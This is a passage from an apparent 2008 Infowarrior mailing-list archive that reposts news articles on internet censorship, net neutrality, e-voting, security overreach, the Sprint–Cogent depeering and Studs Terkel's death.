and electronic products and services. The protection of intellectual property rights in all media, the defense of the freedom to read and the freedom to publish at home and abroad, and the promotion of reading and literacy are among the Association?s highest priorities. For further information, see www.publishers.org. About Google Inc. and Google Book Search Google?s innovative search technologies connect millions of people around the world with information every day. Google Book Search was launched in 2004, and today enables the full text searching of more than a million books online. More than 20,000 publishers and 28 libraries around the world currently work with Google to market their books through the service. Google is headquartered in Silicon Valley with offices throughout the Americas, Europe and Asia. For more information, visit www.google.com and books.google.com. Contacts: Authors Guild: Matthew Traub (matthew_traub at dkcnews.com) 212-981-5207, Joe DePlasco (joe_deplasco at dkcnews.com), 212-981-5125 Association of American Publishers: Judy Platt, jplatt at publishers.org, 202-220-4551 Google: Megan Lamb, press at google.com, 650-930-3555 The Author Sub-Class and the Authors Guild, Inc. are represented by Michael J. Boni and Joanne Zack of Boni & Zack LLC, Bala Cynwyd, PA, 610-822-0200, www.bonizack.com, bookclaims at bonizack.com. The Publisher Sub-Class, the Association of American Publishers, Inc., The McGraw-Hill Companies, Inc., Pearson Education, Inc., Penguin Group (USA) Inc., John Wiley & Sons, Inc., and Simon & Schuster, Inc. are represented by Jeffrey P. Cunard and Bruce P. Keller of Debevoise & Plimpton LLP, New York, NY, 212-909-6000, www.debevoise.com, bookclaims at debevoise.com . From rforno at infowarrior.org Wed Oct 29 17:57:51 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 29 Oct 2008 13:57:51 -0400 Subject: [Infowarrior] - Google, Microsoft help found anti-censorship group Message-ID: <27A6E6D6-F014-43BE-80C6-89A5B0E735F0@infowarrior.org> Google, Microsoft help found anti-censorship group Google, Microsoft and Yahoo are among the founding members of a new anti-censorship group called the Global Network Initiative, reports indicate. The organization also has the backing of investor, human rights and press freedom groups, such as the Center for Democracy and Technology. The GNI is specifically aimed at forming a consistent approach to dealing with countries that block free speech on the Internet, such as China. Many governments around the world filter search results, or simply prevent citizens from accessing certain websites. Participation in GNI marks a reversal of policy by the three tech companies, which have in the past been accused of collaborating with governments to censor websites, or even helping to hunt down political dissidents. It is in fact uncertain to what degree the corporations will actually protest government actions; human rights motions were voted down at the last Google shareholder meeting, and Microsoft is said to have published a paper indicating it would continue to follow local censorship restrictions, regardless of whether they violate rights held elsewhere. http://www.electronista.com/articles/08/10/29/new.anti.censorship.group/ From rforno at infowarrior.org Thu Oct 30 02:22:56 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 29 Oct 2008 22:22:56 -0400 Subject: [Infowarrior] - E-Speech: The (Uncertain) Future of Free Expression Message-ID: <45548344-FB4C-4E99-8826-07A8BE23D9BE@infowarrior.org> E-Speech: The (Uncertain) Future of Free Expression http://www.truthdig.com/report/item/20081024_e_speech_the_uncertain_future_of_free_expression/ Posted on Oct 28, 2008 By Aram Sinnreich and Masha Zager Imagine this: It?s the day before your daughter?s birthday. She lives in another state, so you make a video of the rest of the family singing ?Happy Birthday to You? on your camcorder and put the videotape in a box with her address on it. But at the post office, you?re told the box will take two weeks to deliver unless you pay your daughter?s local mail carrier an extra delivery fee. So instead, you write her a letter describing the video and including the lyrics to ?Happy Birthday to You.? She never receives the letter; unbeknownst to you, the post office has opened it en route, and, seeing that you?ve enclosed copyrighted materials (yes, the ?Happy Birthday? song is copyrighted), has decided not to deliver the envelope to her. You write her another letter, without the song lyrics, and although it arrives on her doorstep intact, she can?t open it because you used a large manila envelope and her electric letter opener works only on size A2, A6 and A7 envelopes. You decide to fly out and deliver your birthday wishes in person. After the usual hour-long wait at the airport, you reach the metal detector. A TSA officer asks you to come to a private room, where you are searched and questioned, and left waiting for six hours. The airport security officers repeatedly ask you about your plans for a future visit to China, which is strange, because you mentioned these plans only once, during a private conversation with a friend. Finally you are allowed to board a plane, and a few hours later your daughter meets you when you land. You give her a big hug and try to sing ?Happy Birthday.? However, when you open your mouth, no sound comes out. You can speak perfectly well, but for some reason you are unable to sing. If this scenario sounds absurd, that?s because it is. If it sounds unrealistic, that?s because you haven?t been paying attention. Although no one is slowing down or opening your posted letters, spying on your face-to-face conversations or restricting your physical ability to make music, all of these barriers to free speech?and more? are becoming increasingly prevalent in the world of digital communications. And as tools like the Web, e-mail, voice over IP, Internet video, mobile phones and peer-to-peer file sharing become increasingly vital to our relationships with family, friends, colleagues, businesses and government institutions, these limitations on speech and threats to our privacy are becoming increasingly important civil rights issues. When we talk about unequal access to computers and other digital communication technologies, we speak about the ?digital divide.? When we talk about the concentrated ownership of the Internet access business, we can point to a simple, powerful statistic: Four companies control nearly 60 percent of the American ISP market, and four companies control nearly 90 percent of the American mobile phone market. But there?s no simple way to talk about the interrelated issues of electronic surveillance, network neutrality, asymmetry and ?walled garden? technologies that collectively threaten free expression in the digital world. Without a name for the big picture, it?s difficult to do anything about it. Imagine trying to reverse global warming, reduce pollution and save species from extinction without the umbrella of the word environmentalism connecting the issues. Therefore, we propose the term e-speech as a concept to unite these issues, and to discuss potential solutions to the problem they collectively pose. First, however, we should briefly discuss the issues themselves. Most of us have read about the surveillance of our phone conversations, and the recent amendment to the Foreign Intelligence Surveillance Act (FISA) retroactively granting immunity to companies like AT&T and Verizon for illegally handing our private information over to the federal government. However, fewer people are aware of the Stored Communications Act (SCA), which the government has used to obtain access to Web-based e-mail without getting a warrant or notifying the account holder. Similarly, the Anti-Counterfeiting Trade Agreement (ACTA), an international treaty currently under negotiation, may allow customs officials to search our computers, MP3 players and other electronic devices for unpermissioned content when we travel, and may force ISPs to disclose more information about our online activities to copyright owners claiming infringement. ACTA negotiations have been held in secret, and what little we know is the result of leaks. Despite not telling us much about it, the Office of the United States Trade Representative (USTR) says it is trying to ?complete the new agreement as quickly as possible.? The Electronic Frontier Foundation and Public Knowledge recently filed suit against the USTR, demanding more information about ACTA before it?s actually ratified. Another potential threat to civil liberties online is the end of network neutrality, or nondiscriminatory delivery of online communications. Some ISPs have begun to argue that they should be allowed to collect an extra fee from the application provider for delivering an e-mail, Web page or video to an end user. Former AT&T CEO Ed Whitacre summed up their justification well, arguing that ?for a Google or Yahoo or Vonage or anybody to expect to use these pipes [for] free is nuts!? However, this argument doesn?t hold much water when you consider that both the originator and the end user are paying for their Internet access; in essence, the ISPs would like to get paid by three separate parties to deliver a single e-mail or voice message from point A to point B. In reality, the purpose of such fees would be to protect ISPs? video services from competition by Internet-based video (such as YouTube), and ISPs? phone services from competition by Internet-based VoIP (such as Skype). And for any Internet communications that did take place, major publishers and advertisers could outbid the rest of us, consigning us to the slow lane. In the short term, this could make Web- based services like audio/video chatting and video sharing more expensive. In the longer term, it could bring an end to the proliferation of new voices and creative new services that we?ve gotten used to seeing on the Web. There is no legislation supporting or rejecting net neutrality (this may change soon; several bills have been introduced on both sides); however, net neutrality currently stands as Federal Communications Commission policy. Even so, there are many cases in which Internet providers have apparently broken the rules. Most famously, Comcast, the nation?s second-largest ISP, was caught throttling bandwidth for customers who used the BitTorrent file sharing protocol. Although the FCC ruled that the company had to stop, Comcast has appealed the decision. In the meantime, Comcast has amended its broadband user policy, capping monthly usage at 250 gigabytes (not much for fans of digital video). Yet another hindrance to free speech and open communications online is asymmetrical access (the ?A? in ?ADSL?). Nearly all broadband ISPs? even in the age of YouTube, Skype and MySpace?offer downstream speeds (from the Internet to the user) that are much faster than upstream speeds (from the user to the Internet). This is a legacy of the cable networks? origins in the unidirectional world of TV programming, and of the antiquated vision of the Internet as an ?information superhighway? by which consumers would access information. Few people anticipated that Americans would be as interested in producing content as they were in consuming it, or that they might want to use video for communicating. So regulators failed to address communication to the Internet, and the original vision of the Internet became enshrined in industrywide technology standards. Today, most providers still use technologies that are downstream-oriented. A few new technologies (Active Ethernet, GPON, VDSL2) support high upstream speeds, but it will take years, and hundreds of billions of dollars, to upgrade all of our networks to use them. Finally, free speech online is threatened by ?walled garden? services and technologies, in which the ISP or wireless provider determines what content the user has access to, what software the user can install, and even what formats are permissible for encoding audio or video. Walled garden services for the PC had their heyday in the 1990s (remember AOL, CompuServe and Prodigy?), but we are only beginning to see the extent to which they will dominate the Internet on wireless devices. A great example of a walled garden is Apple?s iPhone. Spending several hundred dollars to purchase one doesn?t give you permission to install the software of your choice or distribute software to other users. Apple has already used its power to block software providers attempting to compete with Apple?s own software, such as the e-mail application that comes bundled with the device. Even more worrisome, Apple CEO Steve Jobs has acknowledged that iPhones are equipped with a ?kill switch? that allows the company to remotely delete applications from your phone. The company calls this a last-ditch security protocol to disable malware, but it comes at the cost of consumer control. Imagine if General Electric could remotely remove food from your fridge that it deemed unsafe. Now imagine that GE is also one of the top providers of meat, cheese and veggies to American supermarkets. Clearly, this is not a combination in the consumer?s best interest. (To be fair, most wireless phones have even more ?walls? and less ?garden? than the iPhone does.) What are we to do about these threats to liberty, privacy and autonomy in the digital world? In view of the problems we?ve discussed, unfettered Internet access requires either: ? Laws that strictly protect digital privacy and net neutrality, deter abuse of market power, and encourage investment in new ultra-broadband technologies; or ? User-owned or unmanaged networks with very-high-speed connections. For the sake of argument, let?s dismiss the first of these as impractical, or at least unlikely in the current political climate. But how about the second? In theory, you could buy a length of fiber optic cable (which can support tremendous symmetrical bandwidth over long distances) and run it directly from your house to the nearest Internet point of presence (POP). You then buy an electronic gadget for each end of the cable. You plug one gadget into your computer and the other one into the Internet. Now you can upload and download whatever you like, and there?s no ISP to tell you what you can or can?t do?or turn over your records to some inquisitive government agency. Is this any more feasible than passing a bunch of laws opposed by telecom providers? Well, not exactly. It?s expensive, and complicated. It won?t work unless there?s also fiber at the POP. And what will your neighbor say when you run your cable through her backyard? The solution would be viable if you were, say, a hospital with a lot of money and an IT staff and a need to upload and download gigantic medical image files. In fact, customer-owned fiber is a reality today for such large organizations. For smaller companies, however, ?condominium fiber? may be a better option. Condo fiber providers install the fiber backbone and negotiate rights of way with the neighbors. Then they sell individual strands of fiber to their customers and collect a small annual maintenance fee. For individuals, no such solution has been developed. But different organizations are inching toward it from different angles, and if we can take the best aspects of each approach, an e-speech solution might emerge. Here are four of the partial solutions being proposed: ? In Canada, CANARIE?the public/private organization that runs Canada?s advanced research network?is trying to jump-start a residential condo fiber project. Bill St. Arnaud, CANARIE?s chief research officer, asked residents in an Ottawa neighborhood whether they wanted their own fiber connections to the Internet; about a third said they did. He then convinced a business fiber provider to run a trunk line through the neighborhood, and to agree to run a connection to the nearest Internet POP for any neighborhood resident who could pay about $1,500. He also worked out a complex financing scheme (he calls it ?green broadband??don?t ask) to make the fiber easily affordable for those who can?t buy it outright. At the POP, customers will have to connect their fiber to an ISP?s equipment. In theory, customers can choose among ISPs. But there?s a slight hitch: As of this writing, no ISPs have agreed to participate. ? Many Swedish cities operate publicly owned systems that work in ways similarly to the CANARIE scheme. These municipal fiber networks are open to any ISP?some have dozens of competing ISPs?and the operator will run fiber to any building where the owner pays for a connection. Individual homeowners finance their fiber connections by adding around $10 to their monthly mortgage payments (a better investment than granite countertops in terms of resale price). As in the CANARIE plan, customers can decide whether and when to install the fiber; once connected, they can change ISPs at the click of a mouse. This model is starting to catch on in other European countries, such as the Netherlands. In the U.S. there are about 60 municipal fiber networks?some states allow them, others don?t?and a few have succeeded in attracting multiple ISPs. None of them, however, put the customer in charge of connecting to the network, even though customer- controlled fiber helps attract ISPs due to the low investment costs and high degree of customer loyalty. ? A company called Copowi (short for Community Powered Internet) was launched in 2007 as the first strictly ?net neutral? ISP. It now offers broadband services in 12 Western states over DSL lines wholesaled by Verizon, AT&T and Qwest. Copowi promises not to block, degrade or modify data or to discriminate for commercial advantage on the basis of source or destination?with exceptions for necessities such as spam prevention and, of course, law enforcement. It also provides encryption for e-mail and Web surfing, both to help users protect their privacy and to make it more difficult for network owners to implement non-neutral access. After a year in business, Copowi has about 4,000 customers, according to founding partner George Matafonov. Eventually it would like to partner with more network owners or even to build its own networks, but first it needs to develop a larger subscriber base, which isn?t easy for a niche player. ? New ?mesh? wireless networking gear?which lets people share Internet access something like BitTorrent lets them share files?has made it easy and inexpensive to create decentralized networks. Wireless mesh networks are now being used in locations as diverse as low-income housing projects, Indian reservations and South African schools. Citywide (or nearly citywide) mesh networks are being built in places like San Francisco and Urbana, Ill. Internet access becomes much less expensive because neighbors can share a commercial DSL connection in the same way that co-workers in an office do. However, mesh networks tend to be less decentralized in practice than they are in theory, and for technical reasons any really large mesh network seems to require a degree of structure and management. And even a decentralized mesh network is dependent on an ISP to communicate with others outside the neighborhood. All of these efforts offer partial solutions to the problem of guaranteeing free expression over digital networks. Remember that the components of the problem we identified include unwarranted government intrusion; ISP self-dealing (net neutrality and the walled garden); and asymmetry. Looking at each of the solutions in turn: Private condo fiber, if it ever exists, will solve the asymmetry problem nicely and give the customer some ammunition against ISP self- dealing. However, it will do nothing to combat government intrusion. Public condo fiber (the Swedish solution) will face an uphill battle in the U.S., where phone and cable companies routinely delay municipal broadband projects with nuisance lawsuits and sometimes derail them altogether with legislation. However, when public fiber networks are built, they solve the asymmetry problem. And, if they attract competing service providers, they may help counter ISP self-dealing. Also, local governments may be able to stand up to unwarranted federal law-enforcement demands more effectively than private operators can, though the odds of this aren?t great. Net neutral ISPs (such as Copowi) are a terrific solution to net neutrality and walled-garden problems, but they can?t address the asymmetry issue because they rely on existing network technology. This solution also fails to address governmental intrusions on privacy, because Copowi is legally obligated, just as AT&T, Comcast and the other large ISPs are, to cooperate with these intrusions. Decentralized wireless mesh networks offer some hope of protecting freedom of communications within the network, if not between the network and the public Internet. As community wireless activist Sascha Meinrath writes, ?What happens when a group of friends get together and buys a single line that is then shared among them? What happens when an apartment building buys a line and shares it? What happens when a community or neighborhood gets a line and shares it? ? Who ?owns? an ownerless network? Because that (non)entity is required by [law] to provide surveillance capabilities on that network ? [it] represents an unenforceable mandate.? But wireless mesh networks are not well equipped to handle the other problems we?ve discussed. Because a wireless network can?t communicate with the Internet until it finds a wire, it is dependent on a single ISP. Ultimately it is limited by the ISP?s access speeds and network management policies. If wireless devices were ever to become powerful and prevalent enough for the mesh to replace much of the Internet as we know it, every mobile phone and laptop could become a voluntary peer in a global community of equals, without oversight or restrictions. Alternatively, if virtualization, a technology that slices up computers into multiple ?virtual? machines, is ever successfully applied to the hardware at the Internet POP (right now it?s busy transforming the corporate data center), we could conceivably all afford to be our own ISPs someday. But the limitations of current technology?as well as the opposition of ISPs and telcos, fighting to fend off what they see as a doomsday scenario?make these blissful utopias unlikely anytime soon. In the meantime, keeping in mind our mantra of ?e-speech,? we can continue to push federal regulators and access providers to support net neutrality and lower their garden walls, and we can continue to experiment with new models for community-owned and decentralized access. Most important, however, we have to remain aware of our civil liberties in the Digital Age, and to realize how easily?and invisibly? they can be removed. From rforno at infowarrior.org Thu Oct 30 03:14:23 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 29 Oct 2008 23:14:23 -0400 Subject: [Infowarrior] - MD, VA, other states ditching e-voting machines Message-ID: <6EA78FE4-5C62-4BC7-AC87-189E86F4E0F2@infowarrior.org> Paper Ballot Has Md.'s, Va.'s Vote 2 States Plan to Ditch Electronic Machines, Part of a Rapid National Reversal By Christian Davenport Washington Post Staff Writer Thursday, October 30, 2008; B01 Goodbye, electronic voting. Farewell, fancy touch screen. Maryland and Virginia are going old school after Tuesday's election. Maryland will scrap its $65 million electronic system and go back to paper ballots in time for the 2010 midterm elections -- and will still be paying for the abandoned system until 2014. In Virginia, localities are moving to paper after the General Assembly voted last year to phase out electronic voting machines as they wear out. It was just a few years ago that electronic voting machines were heralded as a computerized panacea to the hanging chad, a state-of-the- art system immune to the kinds of hijinks and confusion that some say make paper ballots vulnerable. But now, after concern that the electronic voting machines could crash or be hacked, the two states are swinging away from the systems, saying paper ballots filled out by hand are more reliable, especially in a recount. The trend reflects a national movement away from electronic voting machines. About a third of all voters will use them Tuesday, down from a peak of almost 40 percent in 2006, according to Election Data Services, a Manassas-based consulting firm specializing in election administration. Every jurisdiction that has changed election systems since 2006 has gone to paper ballots read by optical scan machines, said Kimball Brace, the firm's president. And for the first time in the country's history, fewer jurisdictions will be using electronic machines than in the previous election, he said. "The battle for the hearts and minds of voters on whether electronic systems are good or bad has been lost," Brace said. The academics and computer scientists who said they were unreliable "have won that battle." < - > http://www.washingtonpost.com/wp-dyn/content/article/2008/10/29/AR2008102904105_pf.html From rforno at infowarrior.org Thu Oct 30 16:15:17 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 30 Oct 2008 12:15:17 -0400 Subject: [Infowarrior] - Secret Buildings You May Not Photograph, Part 643 Message-ID: <38384FB3-E27E-404D-8C59-5410250B82A2@infowarrior.org> Secret Buildings You May Not Photograph, Part 643 http://blog.washingtonpost.com/rawfisher/2007/07//secret_buildings_you_may_not_p.html If you happen by 3701 N. Fairfax Drive in Arlington and decide you have a sudden craving for a photograph of a generic suburban office building, and you point your camera at said structure, you will rather quickly be greeted by uniformed security folks who will demand that you delete the image and require that you give up various personal information. When Keith McCammon unwittingly took a picture of that building, he was launched on an odyssey that has so far involved an Arlington police officer, the chief of police and the defense of the United States of America. McCammon could not have been expected to know when he wandered by the building that it houses the Defense Advanced Research Projects Agency, a low-profile wing of the Defense Department that conducts all manner of high-tech research that evolves into weapons systems and high-order strategery. DARPA's presence at 3701 N. Fairfax is hardly a government secret-- Google finds nearly 10,000 pages listing the agency's use of the building. But there's no big fat sign on the building, so how was McCammon to know that this was a building he dared not photograph? And why would the government care if anyone took a picture of the exterior of an office building? This is as silly and hypersensitive as the now- common harassment of people who innocently take pictures of random federal buildings in the District. McCammon decided to fight back. He demanded to know why he had been stopped, why the government needed his personal information, and why any record of the incident should be kept in government records. He got quick, polite responses from Arlington officials. "I hope that you would agree that the security of any such building is of great importance and every law enforcement officer is duty bound to investigate all suspicious activity," wrote Arlington Acting Police Chief Daniel Murray. "I am certainly not implying that a person taking photographs is inherently 'suspicious,' but when the appearance is that the subject of a photograph is a government installation, officers have a duty to ensure the safety of the occupants of this structure." Hmmm. Any government installation? This overly broad approach to security is why we end up with ridiculous horror stories about innocent tourists getting hassled for taking photos of the Lincoln Memorial or the Department of the Interior. The good news here is that Arlington police didn't take a report or create a file on McCammon. The bad news is that they did pass his information along to "the internal security agency for this installation." Which means that somewhere in the vast security apparatus that we have constructed since 9/11--utterly ignoring the fact that the Soviet empire collapsed under the weight of its own paranoid security apparatus--there is now a report on Keith McCammon, photographer. The bottom line is that McCammon was caught in a classic logical trap. If he had only known the building was off-limits to photographers, he would have avoided it. But he was not allowed to know that fact. "Reasonable, law-abiding people tend to avoid these types of things when it can be helped," McCammon wrote. "Thus, my request for a list of locations within Arlington County that are unmarked, but at which photography is either prohibited or discouraged according to some (public or private) policy. Of course, such a list does not exist. Catch-22." The only antidote to this security mania is sunshine. Only when more and more Americans do as McCammon has done and take the time and effort to chronicle these excesses and insist on answers from authorities will we stand a chance of restoring balance and sanity to the blend of liberty and security that we are madly remixing in these confused times. From rforno at infowarrior.org Fri Oct 31 12:17:05 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 08:17:05 -0400 Subject: [Infowarrior] - Oz to implement mandatory internet censorship Message-ID: <305F76C2-C37E-450E-94F1-738263CFBF81@infowarrior.org> Australia to implement mandatory internet censorship Article from: Herald Sun http://www.news.com.au/heraldsun/story/0,21985,24568137-2862,00.html October 29, 2008 12:02pm AUSTRALIA will join China in implementing mandatory censoring of the internet under plans put forward by the Federal Government. The revelations emerge as US tech giants Google, Microsoft and Yahoo, and a coalition of human rights and other groups unveiled a code of conduct aimed at safeguarding online freedom of speech and privacy. The government has declared it will not let internet users opt out of the proposed national internet filter. The plan was first created as a way to combat child pronography and adult content, but could be extended to include controversial websites on euthanasia or anorexia. Communications minister Stephen Conroy revealed the mandatory censorship to the Senate estimates committee as the Global Network Initiative, bringing together leading companies, human rights organisations, academics and investors, committed the technology firms to "protect the freedom of expression and privacy rights of their users". Mr Conroy said trials were yet to be carried out, but "we are talking about mandatory blocking, where possible, of illegal material." The net nanny proposal was originally going to allow Australians who wanted uncensored access to the web the option of contacting their internet service provider to be excluded from the service. Human Rights Watch has condemned internet censorship, and argued to the US Senate "there is a real danger of a Virtual Curtain dividing the internet, much as the Iron Curtain did during the Cold War, because some governments fear the potential of the internet, (and) want to control it" Groups including the System Administrators Guild of Australia and Electronic Frontiers Australia have attacked the proposal, saying it would unfairly restrict Australians' access to the web, slow internet speeds and raise the price of internet access. EFA board member Colin Jacobs said it would have little effect on illegal internet content, including child pornography, as it would not cover file-sharing networks. "If the Government would actually come out and say we're only targeting child pornography it would be a different debate," he said. The technology companies' move, which follows criticism that the companies were assisting censorship of the internet in nations such as China, requires them to narrowly interpret government requests for information or censorship and to fight to minimise cooperation. The initiative provides a systematic approach to "work together in resisting efforts by governments that seek to enlist companies in acts of censorship and surveillance that violate international standards", the participants said. In a statement, Yahoo co-founder and chief executive Jerry Yang welcomed the new code of conduct. "These principles provide a valuable roadmap for companies like Yahoo operating in markets where freedom of expression and privacy are unfairly restricted," he said. "Yahoo was founded on the belief that promoting access to information can enrich people's lives, and the principles we unveil today reflect our determination that our actions match our values around the world." Yahoo was thrust into the forefront of the online rights issue after the Californian company helped Chinese police identify cyber dissidents whose supposed crime was expressing their views online. China exercises strict control over the internet, blocking sites linked to Chinese dissidents, the outlawed Falun Gong spiritual movement, the Tibetan government-in-exile and those with information on the 1989 Tiananmen massacre. A number of US companies, including Microsoft, Cisco, Google and Yahoo, have been hauled before the US Congress in recent years and accused of complicity in building the "Great Firewall of China". The Australian Christian Lobby, however, has welcomed the proposals. Managing director Jim Wallace said the measures were needed. "The need to prevent access to illegal hard-core material and child pornography must be placed above the industry's desire for unfettered access," Mr Wallace said. From rforno at infowarrior.org Fri Oct 31 12:20:09 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 08:20:09 -0400 Subject: [Infowarrior] - Net Neutrality? Sprint cuts Cogent net routing Message-ID: <1F2B25BE-4733-4836-B662-69C4EB034838@infowarrior.org> http://www.earthtimes.org/articles/show/sprint-nextel-severs-its-internet-connection-to-cogent-communications,603138.shtml Sprint-Nextel Severs Its Internet Connection to Cogent Communications Posted : Fri, 31 Oct 2008 01:41:31 GMT Author : Cogent Communications Category : Press Release WASHINGTON, Oct. 30 DC-Cogent-Sprint-Law WASHINGTON, Oct. 30 /PRNewswire-FirstCall/ -- On October 30 at 4:30 pm Sprint-Nextel severed its Internet connection to Cogent thereby partitioning the Internet. It is no longer possible for many Sprint customers and Cogent customers to directly communicate across the Internet. Sprint did so in violation of a contractual obligation to exchange Internet traffic with Cogent on a settlement free peering basis. Sprint and Cogent are engaged in litigation over this matter. Cogent regrets that Sprint chose to take this unilateral action rather than await a determination by the court as to the rights of the parties. Cogent remains ready to reestablish, on the same settlement free basis as previously existed, the connections that Sprint has severed. In the over 1300 on-net locations worldwide where Cogent provides service, Cogent is offering every Sprint-Nextel wireline customer that is unable to connect to Cogent's customers a free 100 megabit per second connection to the Internet for as long as Sprint continues to keep this partitioning of the Internet in place. Unfortunately, there is no way that Cogent can do the same for the wireless customers of Sprint-Nextel. All other major wireless carriers have full connectivity to Cogent and are unaffected by this event. From rforno at infowarrior.org Fri Oct 31 18:45:21 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 14:45:21 -0400 Subject: [Infowarrior] - World faces growing risk of war: US intelligence chief Message-ID: <6076F8A3-C15B-4F1F-8E7C-E41B49E00B4B@infowarrior.org> http://www.breitbart.com/print.php?id=081031180559.hq1yll01&show_article=1 World faces growing risk of war: US intelligence chief Oct 31 02:06 PM US/Eastern The world faces a growing risk of conflict over the next 20 to 30 years amid an unprecedented transfer of wealth and power from West to East, according to the US intelligence chief. Michael McConnell, the director of national intelligence, predicted rising demand for scarce supplies of food and fuel, strategic competition over new technologies, and the spread of weapons of mass destruction. "What I'm suggesting -- there's an increased potential for conflict," McConnell said in a speech Thursday to intelligence professionals in Nashville, Tennessee. "During the period of this assessment, out to 2025, the probability for conflict between nations and within nation-state entities will be greater," he said. Conditions for "large casualty terrorist attacks using chemical, biological, or less likely, nuclear materials" also will increase during that period, he said. McConnell described a multi-polar world in 2025 shaped by the rise of China, India and Brazil, whose economies will by then match those of the western industrial states. "In terms of size, speed, and directional flow, the transfer of global wealth and economic power, now underway, as noted from West to East is without precedent in modern history," McConnell said. Territorial expansion and military rivalries are not likely but cannot be ruled out, he said. "We judge these sweeping changes will not trigger a complete breakdown of the current international system, but the next 20 years of transition to a new system are fraught with risks and many, many challenges," he said. By 2025, China is likely to have the world's second largest economy and to have emerged as a major military power, the largest importer of natural resources and the largest contributor to world pollution. "China is poised to have more impact on the world over the next 20 years than any other country," he said. India will have either the third or second largest economy and will press to become "one of the significant poles of this new world," he said. Russia also will be part of that group but only if it expands and diversifies its economy and integrates it with the world global economy, he said. "Strategic rivalries are most likely to revolve around trade, demographics, access to natural resources, investments and technological innovation. There will be a struggle to acquire technology advantage as the key enabler for dominance," he said. Copyright AFP 2008, AFP stories and photos shall not be published, broadcast, rewritten for broadcast or publication or redistributed directly or indirectly in any medium From rforno at infowarrior.org Fri Oct 31 23:38:26 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 19:38:26 -0400 Subject: [Infowarrior] - RIP Studs Terkel Message-ID: <2B1E308C-9925-408D-8591-62F39427FFD2@infowarrior.org> November 1, 2008 Studs Terkel, Chronicler of the American Everyman, Is Dead at 96 By WILLIAM GRIMES http://www.nytimes.com/2008/11/01/books/01terkel.html?_r=1&hp=&oref=slogin&pagewanted=print Studs Terkel, a Pulitzer prize-winning author whose searching interviews with ordinary Americans helped establish oral history as an important historical genre, and who for nearly half a century was the voluble host of a radio show in Chicago, died Friday at his home in Chicago. He was 96. His death was confirmed by Lois Baum, a friend and longtime colleague at WFMT radio. In his oral histories, which he called guerrilla journalism, Studs Terkel relied on his enthusiastic but gentle interviewing style to elicit, in rich detail, the experiences and thoughts of ordinary Americans. ?Division Street: America? (1966), his first best-seller and the first in a triptych of tape-recorded works, explored the urban conflicts of the 1960s. Its success led to ?Hard Times: An Oral History of the Great Depression?(1970) and ?Working: People Talk About What They Do All Day and How They Feel About What They Do?(1974). ? ?The Good War?: An Oral History of World War II,? won the 1985 Pulitzer Prize for nonfiction. In ?Talking to Myself,? Mr. Terkel turned the microphone on himself to produce an engaging memoir, and more recently, in ?Race: How Blacks and Whites Think and Feel About the American Obsession? (1992) and ?Coming of Age: The Story of Our Century by Those Who?ve Lived It?(1995)? he reached for his ever-present tape recorder for interviews on race relations in the United States and the experience of growing old. Although detractors derided him as a sentimental populist whose views were simplistic and occasionally maudlin, Mr. Terkel was widely credited with transforming oral history into a popular literary form. In 1985 a reviewer for The Financial Times of London characterized Mr. Terkel?s books as ?completely free of sociological claptrap, armchair revisionism and academic moralizing.? The elfin, amiable Mr. Terkel was a gifted and seemingly tireless interviewer who elicited provocative insights and colorful, detailed personal histories from a broad mix of people. ?The thing I?m able to do, I guess, is break down walls,? he once told an interviewer. ?If they think you?re listening, they?ll talk. It?s more of a conversation than an interview.? Mr. Terkel?s succeeded as an interviewer in part because he believed most people had something to say worth hearing. ?The average American has an indigenous intelligence, a native wit,? he said. ?It?s only a question of piquing that intelligence. In ?American Dreams: Lost and Found? (1980), he interviewed police officers and convicts, nurses and loggers, former slaves and former Ku Klux Klansmen, a typical crowd for Mr. Terkel. Readers of his books could only guess at Mr. Terkel?s interview style. Listeners to his daily radio show, which was broadcast on WFMT since 1958, got the full Terkel flavor, as the host, with breathy eagerness and a tough-guy Chicago accent, went after the straight dope from such guests as Sir Georg Solti ,Toni Morrison and Gloria Steinem. ?It isn?t an inquisition, it?s an exploration, usually an exploration into the past,? he once said, explaining his approach. ?So I think the gentlest question is the best one, and the gentlest is, ?And what happened then?{minute} ? Studs Terkel was born in the Bronx on May 16, 1912, the third son of Samuel Terkel, a tailor, and the former Anna Finkel, who had immigrated from Bialystok, Poland. In 1923 the family moved to Chicago. In the late 1930s, while acting in the theater, Mr. Terkel dropped his given name, Louis, and adopted the name Studs, from another colorful Chicagoan, James T. Farrell?s fictional Studs Lonigan. His childhood was unhappy. The boy?s father was an invalid who suffered from heart disease. His mother was volatile and impetuous, given to unpredictable rages that kept the household in a state of fear and apprehension. ?What nobody got from her was warmth and love, or at least not a display of it,? Mr. Terkel said. After moving to Chicago, the Terkels managed hotels popular with blue- collar workers, and Mr. Terkel often said that the characters he encountered and the disputations he witnessed at the Wells-Grand Hotel on the Near North Side were his real education. Although he read avidly and feasted on Roget?s Thesaurus, he was, by his own reckoning, no scholar. He earned philosophy and law degrees at the University of Chicago, but after failing a bar exam he worked briefly for the Federal Emergency Relief Administration in Chicago, doing statistical research on unemployment in Omaha. He then found work counting bonds for the Treasury Department in Washington. When he returned to Chicago in 1938, Mr. Terkel, who once described his life as ?an accretion of accidents,? joined the Federal Writers? Project, a New Deal program. He wrote scripts for WGN radio and, after appearing in ?Waiting for Lefty? at the Chicago Repertory Group, found work in soap operas like ?Ma Perkins? and ?Road of Life.? What he called his ?low, husky, menacing? voice made him a natural to play heavies. ?I would always say the same thing and either get killed or sent to Sing-Sing,? he later recalled. It was while performing with the Chicago Repertory Group that he took the name Studs. In 1939 he married Ida Goldberg, a social worker from Wisconsin whom he met while they were both with the Chicago Rep.She died in 1999. The couple had one son, Dan Terkell , who lives in Chicago. After a one-year stint writing speeches and shows in the special services of the Army Air Corps in 1942 and 1943, he was discharged from the military because his perforated eardrums, the result of childhood operations, made him unfit for overseas duty. He found work doing news, sports and commentary for commercial radio stations in Chicago, and in 1945 he was given his own radio show, ?The Wax Museum,? on WENR. Although the show, which ran for two years, was primarily a jazz program, Mr. Terkel also followed his other enthusiasms, playing country music, folk, opera and gospel, as the mood seized him. He was one of the first to promote artists like Mahalia Jackson, Pete Seeger, Woody Guthrie, Big Bill Broonzy and Burl Ives. On occasion, he would 